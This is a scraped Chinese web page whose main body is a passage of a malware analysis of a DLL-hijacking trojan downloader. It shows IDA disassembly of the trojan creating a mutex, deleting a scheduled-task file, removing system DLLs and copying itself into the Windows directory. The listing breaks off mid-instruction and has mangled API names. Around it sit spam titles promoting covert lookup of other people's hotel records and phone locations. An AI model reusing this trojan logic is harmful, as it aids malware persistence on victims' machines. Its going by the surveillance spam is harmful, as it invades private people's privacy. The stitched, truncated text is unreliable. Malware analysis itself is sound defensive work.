怎么才能查到别人的开房记录-高效 如何查女朋
【文章标题】分析一个简单的DLL劫持下载者 【文章作者】ZzAge 【文章目标】某个下载者 【相关工具】ida,ollydbg 【作者 Q Q】85400516 【作者邮箱】zzage@163.com 【作者主页】http://hi.baidu.com/zzage 【文章日期】2008年12月01日 一 创建互斥体 复制内容到剪贴板代码: CODE:00404844 push ebx CODE:00404845 push off Name ; lpName //′′ CODE:0040484A push 0FFFFFFFFh ; int CODE:0040484C push 0 ; lpMutexAttributes CODE:0040484E call sub_403EC4 //互斥体的构建函数 CODE:00404853 call GetLastError_0 CODE:00404858 cmp eax, 0B7h CODE:0040485D jnz short loc_404861 CODE:0040485F mov bl, 1 CODE:00404861 CODE:00404861 loc_404861: ; CODE XREF: sub_404844+19j CODE:00404861 mov eax, ebx CODE:00404863 pop ebx CODE:00404864 retn 二 取Windows目录 复制内容到剪贴板代码: CODE:004041DB push 100h ; uSize CODE:004041E0 push ebx ; lpBuffer CODE:004041E1 call GetWindowsDirectoryA 三 删除计划任务C:\WINDOWS\Tasks\At1.job文件 复制内容到剪贴板代码: CODE:004041FD mov edx, off dword_404530 //′\tasks\at1.job′ CODE:00404202 call sub_403760 CODE:00404207 mov eax, [ebp+var_4] CODE:0040420A call sub_403840 CODE:0040420F push eax ; lpFileName CODE:00404210 call eteFileA 四 把Windows目录下的wsock32x.dll,lpk.dll,avp.的文件属性设置为正常,并且删除其文件,然后把木马自身复制到Windows目录下,新命名为avp.。 复制内容到剪贴板代码: CODE:0040422C mov edx, off dword_404548//′\wsock32x.dll′ CODE:00404231 call sub_403760 CODE:00404236 mov eax, [ebp+var_8] CODE:00404239 call sub_403840 CODE:0040423E push eax ; lpFileName CODE:0040423F call FileAttributesA CODE:00404244 push 80h ; dwFileAttributes CODE:00404249 lea eax, [ebp+var_C] CODE:0040424C mov edx, ebx CODE:0040424E mov ecx, 101h CODE:00404253 call sub_403740 CODE:00404258 lea eax, [ebp+var_C] CODE:0040425B mov edx, off dword_404560 //′\lpk.dll′ CODE:00404260 call sub_403760 CODE:00404265 mov eax, [ebp+var_C] CODE:00404268 call sub_403840 CODE:0040426D push eax ; lpFileName CODE:0040426E call FileAttributesA CODE:00404273 push 80h ; dwFileAttributes CODE:00404278 lea eax, [ebp+var_10] CODE:0040427B mov edx, ebx CODE:0040427D mov ecx, 101h CODE:00404282 call sub_403740 CODE:00404287 lea eax, [ebp+var_10] CODE:0040428A mov edx, off dword_404574 //′\avp.′ CODE:0040428F call sub_403760 CODE:00404294 mov eax, [ebp+var_10] CODE:00404297 call sub_403840 CODE:0040429C push eax ; lpFileName CODE:0040429D call FileAttributesA CODE:004042A2 lea eax, [ebp+var_14] CODE:004042A5 mov edx, ebx CODE:004042A7 mov ecx, 101h CODE:004042AC call sub_403740 CODE:004042B1 lea eax, [ebp+var_14] CODE:004042B4 mov edx, off dword_404548 //′\wsock32x.dll′ CODE:004042B9 call sub_403760 CODE:004042BE mov eax, [ebp+var_14] CODE:004042C1 call sub_403840 CODE:004042C6 push eax ; lpFileName CODE:004042C7 call eteFileA CODE:004042CC lea eax, [ebp+var_18] CODE:004042CF mov edx, ebx CODE:004042D1 mov ecx, 101h CODE:004042D6 call sub_403740 CODE:004042DB lea eax, [ebp+var_18] CODE:004042DE mov edx, off dword_404560 //′\lpk.dll′ CODE:004042E3 call sub_403760 CODE:004042E8 mov eax, [ebp+var_18] CODE:004042EB call sub_403840 CODE:004042F0 push eax ; lpFileName CODE:004042F1 call eteFileA CODE:004042F6 lea eax, [ebp+var_1C] CODE:004042F9 mov edx, ebx CODE:004042FB mov ecx, 101h CODE:00404300
相关文章
黑客锁ip(黑客锁屏软件下载)
本文目录一览: 1、苹果手机的id被黑客锁了怎么办/ 2、为什么ip地址不能锁定黑客就是中国 3、怎样才能知道自己ip已经被黑客锁定了? 4、黑客追踪一个ip真能知道这些吗? 苹果手机的...
手机定位25元一个月是真的吗(手机号定位免费版在线)
手机位置25元一个月是真是假(手机号定位绿色版线上)掏钱就能见到另一方部位,那样的App你需要吗?假如说,有那样一款手机软件,只需键入另一方的联系电话,你也就能清晰的了解另一方的部位,你喜欢吗?如...
sem竞价托管,sem竞价托管哪家好
SEM竞价托管处事你相识吗? SEM竞价托管是结果导向的处事:可以最洪流平的优化账户布局,晋升企业业绩。 SEM竞价托管是针对性强的处事:竞价托管主要是按照客户近况、客户方针客户群体、客户对品牌和销售...
Stuxnet病毒已经感染超过45000个网络
美国《每日邮报》报导,此前,全世界第一个互联网“激光武器”,一种名叫Stuxnet的网络病毒早已感染了全世界超出 45000个互联网,沙特遭受的进攻更为比较严重,60%的个人计算机感染了这类病原体...
怎么知道别人的酒店开房记录?
牛肚、牛百叶、牛筋......是不少人吃火锅的必选品,但杭州警方最近查获2吨“非法加工动物内脏”…… 近日,浙江省杭州市公安机关会同杭州市市场监管等部门,在杭州余杭、萧山和湖州德清等地对生产销售有...
解密利用伪基站设备进行短信咋骗(附:伪基站
感谢周怡的投稿 知道干什么能一天“赚”200元吗?有“背包客”自曝:他每天骑电瓶车,在大街小巷逛2个小时就入帐200元,他背包里装的就是便携式伪基站。 然而,这些“背包客”仅仅是利用“伪基站”实施...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!